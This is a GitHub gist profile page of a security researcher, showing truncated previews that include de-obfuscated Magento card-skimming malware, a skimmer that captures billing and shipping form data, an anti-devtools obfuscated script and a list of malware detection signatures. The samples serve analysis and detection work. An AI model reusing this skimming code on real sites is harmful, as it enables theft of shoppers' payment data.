Skip to content

Instantly share code, notes, and snippets.

View gwillem's full-sized avatar
💫

Willem de Groot gwillem

💫
View GitHub Profile
@gwillem
gwillem / pageseal.js
Created September 16, 2018 00:57
Page Seal partially de-obfuscated
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
const dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`,
{ url: "https://example.org/" });
var window = dom.window
var document = window.document
var $ = require("jquery")(window);
var jQuery = $;
@gwillem
gwillem / stats.txt
Created September 6, 2018 11:48
top malware signature hits for 2018-09-06
4424 magentocore.net/
4023 \x6D\x61\x67\x65\x6E\x74\x6F\x63\x6F\x72\x65\x2E\x6E\x65\x74
4009 \x22\x63\x63\x5F\x65\x78\x70
772 \x63\x68\x65\x63\x6B\x6F\x75\x74
728 \x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C
699 \x6F\x6E\x65\x70\x61\x67\x65
685 CoinHive.
678 \x63\x68\x65\x63\x6B\x6F\x75\x74\x7C
669 \x6F\x6E\x65\x73\x74\x65\x70
648 \x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74
package main
import (
"fmt"
"io/ioutil"
"log"
"strings"
"testing"
"time"
@gwillem
gwillem / screenshot-upload.sh
Created March 13, 2018 12:41
One button screenshot uploader for Ubuntu
#!/bin/bash
# Requires xclip.
# Will create screenshot, upload to your server over SSH and copies the URL to the clipboard for your pleasure.
SRC_PATH=$1
SRC_FILE=$(/usr/bin/basename $SRC_PATH)
PREFIX=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 24 | head -n 1)
DST_FILE="${PREFIX}.png"
@gwillem
gwillem / censys-coinhive.py
Created November 10, 2017 11:29
censys coinhive query
#!/usr/bin/env python
import os
import censys.websites, censys.ipv4
UID = os.getenv('CENSYS_UID')
KEY = os.getenv('CENSYS_KEY')
NEEDLE='coinhive.min.js'

M2 Fingerprint Kata

Objective: create an algorithm that identifies the version of a remote M2 install, by examining at most 5 URIs (limited as to not overload the remote server).

Background: I created a somewhat optimal set of fingerprints for Magento 1. However, for M2 there are fewer unique characteristics. I suspect that combining multiple fingerprints will yield better results. But how to establish the optimal set of fingerprint combinations?

Corpus

Use a list of 234 static files that have different checksums for different M2 versions.

@gwillem
gwillem / malware-that-detects-firebug-developer-tools.js
Created April 11, 2017 10:26
www.MageReport.com now checks for malware that disables itself when Firebug is detected
! function(n, e, i) {
function t(n, e, i) {
for (var t = e % n.length, r = ""; r.length < n.length; t = (t + i) % n.length) r += n.charAt(t);
return r
}
function r(n, e) {
var i, r, o, c = function(n) {
var e = document.getElementById(n);
return e ? e.value || "" : ""
function loadReports() {
$.post("/home/getReports", {
page: 1
}, function(n) {
document.pageNumber = 1;
document.additionalNumber = 1;
viewReports(n)
});
$.post("/home/getServers", function(n) {
viewServers(n)
@gwillem
gwillem / pubkey.txt
Last active August 4, 2018 11:32
Willem pub key
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCrSuyjWT45ipAEmdeqv2hnKk/T541Na+AN8KpsmYTPSRrdfyYXcH2yHysg/aX9DEDyoZR1WgAW2HmM6rBQN9GfP2EJEzjP+1AzNHaOsCKSStUnUrKJlR0y3WXZny29lH/JqQykIUAC3YGqktwKNGxiQGZ/8HgicvV/0f4ebaqJ5S6o/ccA/Mytk8FNUtjZ9WFVMx9nj8DPLlgT7Z9v9rsPnzD5n5pTyVnttFqzBu4JOFGXkhiuHAQIqfLrLAExDabHH8bgxr8yIKUSEScooxHDY0uXONfGMhOQXQ3TFLuEkysT8qkcYCrfLwXh+pF6ITdDdoqaoxauq6zdid6KzyKn/bn60M1R5r/DIsVh03ASBr8j7JtEsIgHDRdShsF4BB0f6u9vwnsc0eLy8HMQo9zW9A22eT4k4O5WauMGzsyP6hP9mCYpKvDYMNHkC4dgnvaQiSerNmKXc8fBVlQELAaztGkHmdcLT+DFfY/I79UkkhLVEVMXgL9Mk1vawwnioY0M1ANxsmY1kqmTbgMACAULRlTYCzLMw8Ymn/uL5lO/KowLd+jg4rDcP6ZTabpLE3svucK/Y+pREbMLw/cFOVi45A4mmxoSusPvpLs13mGNLL2/XOE/pSQiPaDNn6qzFGtMd9B8tZG24Zpdk8KOW2bH6WkcgLOYhertHiedh7tAgw== willem2018
@gwillem
gwillem / malware.js
Created March 21, 2017 21:20
Sophisticated CC skimming malware
f1 = f2 = f3 = null;
se = false;
if ((f1 = jQuery('form:has([name^=billing])')).size()) f1.change(function() {
localStorage.setItem('__billing123', [this.id, $(this).serialize()])
});
if ((f2 = jQuery('form:has([name^=shipping])')).size()) f2.change(function() {
localStorage.setItem('__shipping123', [this.id, $(this).serialize()])
});
function ebn(n) {